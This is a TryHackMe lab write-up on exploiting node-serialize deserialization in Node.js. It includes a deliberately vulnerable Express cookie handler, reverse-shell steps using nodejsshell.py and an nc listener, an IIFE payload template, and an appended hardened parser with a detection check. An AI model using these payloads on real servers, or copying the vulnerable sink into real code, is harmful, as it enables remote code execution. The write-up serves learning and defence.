JSON Write Up (THM)

The document discusses exploiting deserialization bugs in Node.js applications. It describes a vulnerability where untrusted data from a cookie is passed to the unserialize() function without validation. This allows crafting a malicious cookie payload that executes arbitrary code on the server when deserialized. The document provides steps to generate a reverse shell payload and trigger the bug by making a request with the encoded payload in the cookie header.

JSON write up (THM)

nodeJS / deserialization / web +

While exploring the web application I found a base64-encoded cookie which, when decoded, results in:
{"email"="<theinput>"}
The application was also running on Node.js.
Exploiting Node.js deserialization bug for Remote Code Execution

Untrusted data passed into the unserialize() function of the node-serialize module can be exploited to
achieve arbitrary code execution by passing a serialized JavaScript object containing an Immediately
Invoked Function Expression (IIFE).
The Bug

During a Node.js code review, I happened to see a serialization/deserialization module named
node-serialize. A cookie value that comes from the request was passed into the unserialize() function
provided by the module. Here is a sample Node.js application to imitate the code:

var express = require('express');
var cookieParser = require('cookie-parser');
var escape = require('escape-html');
var serialize = require('node-serialize');

var app = express();
app.use(cookieParser());

app.get('/', function(req, res) {
    if (req.cookies.profile) {
        // Base64-decode the cookie and hand the result straight to node-serialize.
        // This is the vulnerable sink: unserialize() evaluates any string it finds
        // tagged as a serialized function, so the cookie controls code execution.
        var str = Buffer.from(req.cookies.profile, 'base64').toString();
        var obj = serialize.unserialize(str);
        if (obj.username) {
            // return here so the handler does not send a second response below
            return res.send("Hello " + escape(obj.username));
        }
    } else {
        // First visit: set a benign profile cookie, which decodes to
        // {"username":"ajin","country":"india","city":"bangalore"}
        res.cookie('profile', "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=", {
            maxAge: 900000,
            httpOnly: true
        });
    }
    res.send("Hello World");
});

app.listen(3000);

 
Java, PHP, Ruby and Python have a fair share of deserialization bugs. Some
resources explaining these issues:

- Understanding PHP Object Injection
- Java Deserialization Cheat Sheet
- Rails Remote Code Execution Vulnerability Explained
- Arbitrary code execution with Python pickles

JSON write up (THM) 1

Further Exploitation

The vulnerability in the web application is that it reads a cookie named profile from the HTTP request,
base64-decodes the cookie value and passes it to the unserialize() function. As the cookie is untrusted
input, an attacker can craft a malicious cookie value to exploit this vulnerability. I used
nodejsshell.py to generate a reverse shell payload.

1) $ python nodejsshell.py <local IP> <port>

2) $ nc -lvnp <port>

3) Now let's generate the serialized payload and add the IIFE brackets () after the function body:

{"rce":"_$$ND_FUNC$$_function (){
<code generated by nodejsshell.py>
}()"}



4) Base64-encode the payload and make a request to the web server with the encoded payload in the
Cookie header.

5) You get a reverse shell.
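For the defensive side of the bug described above (the cookie handed to unserialize() and the tagged-function payload in step 3), here is an added example of how the cookie handler should have been written. It is not code from the write-up or from node-serialize: the cookie is parsed with JSON.parse, which can only yield plain data, and checked against an allow-list of the three fields the benign cookie actually carries; the sample cookies and the size limits are constructed for this example.

```javascript
// Added example (not from the write-up or from node-serialize): a hardened
// replacement for the cookie handler above. It never calls unserialize();
// the cookie is parsed with JSON.parse, which can only yield plain data, and
// the result is checked against an allow-list of fields before use. A second
// helper flags cookies carrying node-serialize's function tag for logging.

const FUNC_MARKER = '_$$ND_FUNC$$_'; // tag node-serialize puts in front of serialized functions
const ALLOWED_KEYS = new Set(['username', 'country', 'city']); // fields of the benign cookie
const MAX_COOKIE_LEN = 1024; // constructed limits for this example
const MAX_FIELD_LEN = 64;

// Decode a base64 "profile" cookie; return the validated profile object,
// or null if the cookie is missing, malformed or carries anything unexpected.
function parseProfileCookie(cookieB64) {
  if (typeof cookieB64 !== 'string' || cookieB64.length > MAX_COOKIE_LEN) return null;
  let obj;
  try {
    obj = JSON.parse(Buffer.from(cookieB64, 'base64').toString('utf8'));
  } catch (e) {
    return null; // not JSON at all: reject, never fall back to unserialize()
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return null;
  const profile = {};
  for (const [key, value] of Object.entries(obj)) {
    if (!ALLOWED_KEYS.has(key)) return null;                       // e.g. an "rce" field
    if (typeof value !== 'string' || value.length > MAX_FIELD_LEN) return null;
    if (value.includes(FUNC_MARKER)) return null;                  // tagged function as a value
    profile[key] = value;
  }
  return profile;
}

// Detection helper for request logs or a WAF rule: does the decoded cookie
// contain node-serialize's function tag? Legitimate profiles never do.
function looksLikeSerializedFunction(cookieB64) {
  if (typeof cookieB64 !== 'string') return false;
  return Buffer.from(cookieB64, 'base64').toString('utf8').includes(FUNC_MARKER);
}

// Constructed samples: the benign cookie the sample app above sets, and a
// tagged-function cookie of the shape shown in step 3 with a harmless body.
const BENIGN_COOKIE = 'eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0=';
const TAGGED_COOKIE = Buffer.from(
  JSON.stringify({ rce: FUNC_MARKER + 'function (){ return 1 }()' })
).toString('base64');

console.log(parseProfileCookie(BENIGN_COOKIE));          // { username: 'ajin', country: 'india', city: 'bangalore' }
console.log(parseProfileCookie(TAGGED_COOKIE));          // null
console.log(looksLikeSerializedFunction(TAGGED_COOKIE)); // true
```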

